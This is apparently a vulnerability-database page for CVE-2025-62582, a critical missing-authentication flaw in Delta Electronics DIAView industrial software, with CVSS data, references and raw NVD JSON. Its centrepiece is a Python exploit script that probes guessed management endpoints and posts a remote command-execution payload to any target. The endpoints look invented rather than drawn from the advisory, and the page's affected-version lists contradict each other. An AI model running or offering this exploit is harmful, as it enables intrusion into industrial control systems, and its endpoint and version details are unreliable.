Security Vulnerability Report
中文
CVE-2025-62582
CVSS 9.8
CRITICAL
CVE-2025-62582
Published: 2026-01-16 03:16:00
Last Modified: 2026-01-20 16:58:24
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b
Description
Delta Electronics DIAView has multiple vulnerabilities.
CVSS Details
CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
cpe:2.3:a:deltaww:diaview:*:*:*:*:*:*:*:*
-
VULNERABLE
Delta DIAView < 6.0 SP1
Delta DIAView 6.0
Delta DIAView 5.0及更早版本
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62582 Delta DIAView Multiple Vulnerabilities PoC # Note: This is for educational and authorized testing purposes only import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-62582""" # Check for unauthenticated access to management interface endpoints = [ "/DIAView/../config", "/DIAView/system/status", "/DIAView/api/admin/users", "/DIAView/api/system/command" ] vulnerable = False for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and 'password' in response.text.lower(): print(f"[+] Potential vulnerability found at {endpoint}") print(f"[+] Response length: {len(response.text)} bytes") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return vulnerable def exploit_unauthorized_access(target_url): """Exploit unauthorized access vulnerability""" # Attempt to execute system commands via API payload = { "action": "execute", "command": "whoami", "target": "system" } try: url = target_url.rstrip('/') + "/DIAView/api/system/command" response = requests.post(url, json=payload, timeout=10, verify=False) if response.status_code == 200: print("[+] Command execution successful!") print(f"[+] Response: {response.text}") return True except requests.exceptions.RequestException as e: print(f"[-] Exploitation failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62582.py <target_url>") print("Example: python cve-2025-62582.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] Checking for CVE-2025-62582 vulnerabilities\n") if check_vulnerability(target): print("\n[*] Attempting exploitation...") exploit_unauthorized_access(target) else: print("\n[-] Target does not appear to be vulnerable")
References
[1]
CVE.org
https://www.cve.org/CVERecord?id=CVE-2025-62582
[2]
NVD NIST
https://nvd.nist.gov/vuln/detail/CVE-2025-62582
[3]
CVE Details
https://www.cvedetails.com/cve/CVE-2025-62582/
[4]
VulDB
https://vuldb.com/cve/CVE-2025-62582
[5]
https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf
Raw JSON Data
JSON
{"cve": {"id": "CVE-2025-62582", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2026-01-16T03:15:59.830", "lastModified": "2026-01-20T16:58:23.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Delta Electronics DIAView has multiple vulnerabilities."}, {"lang": "es", "value": "Delta Electronics DIAView tiene múltiples vulnerabilidades."}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deltaww:diaview:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "F27FF503-4356-4F27-9A1A-15F4680501BB"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}